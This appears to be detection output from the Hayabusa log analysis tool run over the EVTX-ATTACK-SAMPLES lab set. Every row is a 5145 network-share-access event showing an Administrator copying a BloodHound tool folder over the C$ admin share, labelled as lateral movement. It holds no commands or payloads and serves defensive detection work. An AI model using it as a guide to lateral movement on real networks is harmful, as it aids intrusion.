+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\classnames  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
